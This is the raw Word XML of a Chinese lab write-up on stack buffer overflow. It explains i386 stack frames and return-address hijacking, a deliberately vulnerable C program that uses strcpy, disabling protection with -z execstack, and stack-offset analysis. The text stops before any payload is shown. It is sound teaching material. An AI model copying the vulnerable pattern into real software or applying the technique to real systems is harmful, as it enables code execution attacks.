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22.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId46.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId32.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId40.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId43.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId49.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId52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8" w:name="缓冲区溢出"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">缓冲区溢出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">本实验利用栈缓冲区溢出实现了劫持控制流，运行 shellcode 并启动了 shell。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="20" w:name="实验原理及平台介绍"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">实验原理及平台介绍</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">本实验基于 i386 平台进行，运行的操作系统为 Ubuntu 22.04 jammy，内核版本为 x86_64 Linux 5.15.0-102-generic。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">对于 i386 平台的函数调用过程，一般的栈帧结构为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-----------+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|  ret addr |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-----------+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|  old %ebp |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-----------+ &lt;---- %ebp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|   local   |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| variables |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-----------+ &lt;---- %esp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">对于 local variables，我们可以将其视为函数上下文中的数据缓冲区（data buffer），由于其位于栈上，因此称为栈缓冲区（buffer on stack）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">如果在栈缓冲区写入的数据量超过了 local variables 的范围，即 %ebp - %esp，那么超出写入的数据就会将 old %ebp 和 ret addr 覆盖。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">当我们精心构造一个 payload，将其输入给栈缓冲区，使其恰好将 ret addr 覆写为恶意代码的起始地址 ret addr'，那么在函数返回时，ret 指令就会将 %eip 置为 ret addr'，从而开始执行恶意代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">利用栈缓冲区溢出将 ret addr 覆写为 ret addr'：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-----------+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| ret addr' |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-----------+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|  XXXXXXXX |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-----------+ &lt;---- %ebp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|   XXXXX   |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| XXXXXXXXX |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-----------+ &lt;---- %esp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">函数返回前的退栈操作：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; movl %ebp, %esp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; popl %ebp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-----------+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| ret addr' |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-----------+ &lt;---- %esp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|  XXXXXXXX | ----&gt; %ebp = XXXXXXXX</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-----------+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|   XXXXX   |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| XXXXXXXXX |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-----------+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">函数返回，ret 指令执行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; ret (equals to `popl %eip`)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-----------+ &lt;---- %esp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| ret addr' | ----&gt; %eip = ret addr'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-----------+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|  XXXXXXXX |       %ebp = XXXXXXXX</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-----------+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|   XXXXX   |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| XXXXXXXXX |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-----------+</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="36" w:name="漏洞代码"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">漏洞代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">本实验攻击的漏洞代码为：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&lt;stdlib.h&gt;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argc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argv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[])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buf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128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2048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"%p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"%p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fgets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input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sizeof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input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stdin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))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vulnerable code</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        strcpy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bookmarkStart w:id="21" w:name="代码漏洞分析"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">代码漏洞分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">漏洞代码的行为是：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">stdin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">读取输入到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中</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">将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中的输入拷贝到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">buf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">中</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">其中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">strcpy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">是漏洞代码，由于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的长度远大于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">buf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，因此可能会发生缓冲区溢出，是实现攻击的关键。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">可以构造 payload，将 shellcode 直接放置在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中，并利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">strcpy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">函数将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头部的数据拷贝到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">buf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，这些头部数据将覆盖栈帧中的返回地址，将控制流转移到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的 shellcode。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="25" w:name="安全机制及规避"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">安全机制及规避</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">注意，payload 注入后位于栈上，而我们需要运行这一段内容，因此在编译漏洞代码时，需要指定 gcc 参数</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-z execstack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，使栈上内容可执行，具体 ELF 中的区别为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="443298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home/haooops/Documents/CST/Projects/os-security/memory-security/buf-overflow/img/execstack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添加</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-z execstack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">参数的 ELF 文件中 GNU_STACK segment 属性为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RWE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="35" w:name="攻击准备"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">攻击准备</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">通过反汇编查看</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">函数的栈帧：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="130683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/home/haooops/Documents/CST/Projects/os-security/memory-security/buf-overflow/img/stack-of-main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&gt; lea 0x4(%esp), %ecx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argc      |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------+ &lt;---- %ecx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|  ret addr0  |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------+ &lt;---- %esp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; and $0xfffffff0, %esp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argc      |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------+ &lt;---- %ecx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|  ret addr0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 ...      |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------+ &lt;---- %esp (4-byte align)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; push -0x4(%ecx)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; push %ebp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; mov %esp, %ebp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; push %ecx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argc      |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------+ &lt;---- %ecx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|  ret addr0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 ...    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ret addr1  |       ret addr1 = ret addr0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old ebp   |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------+ &lt;---- %ebp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|    %ecx     |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------+ &lt;---- %esp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">相较于基本栈帧，这里</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">函数的栈帧做了 %esp 的对齐和恢复值保存。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">获取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">buf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">和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在栈上的相对位置：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="164726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home/haooops/Documents/CST/Projects/os-security/memory-security/buf-overflow/img/buffer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7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ret addr1  |       ret addr1 = ret addr0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old ebp   |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------+ &lt;---- %ebp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|    %ecx   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  ...     |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------+ &lt;---- buf = %esp - 0x88</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|     ...     |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|     ...     |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|     ...     |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------+ &lt;---- input = %esp - 0x888</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">查看</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">函数的退栈过程：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="118037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/home/haooops/Documents/CST/Projects/os-security/memory-security/buf-overflow/img/main-ret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&gt; mov -0x4(%ebp), %ecx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argc      |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------+ &lt;---- %ecx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|  ret addr0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 ...    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ret addr1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old ebp   |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------+ &lt;---- %ebp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|    %ecx   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  ...     |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------+ &lt;---- %esp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; leave</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; lea -0x4(%ecx), %esp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argc      |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------+ &lt;---- %ecx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|  ret addr0  |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------+ &lt;---- %esp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|    ...    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ret addr1  |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  old ebp   | ----&gt; %ebp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+-------------+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">lea -0x4(%ecx), %esp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
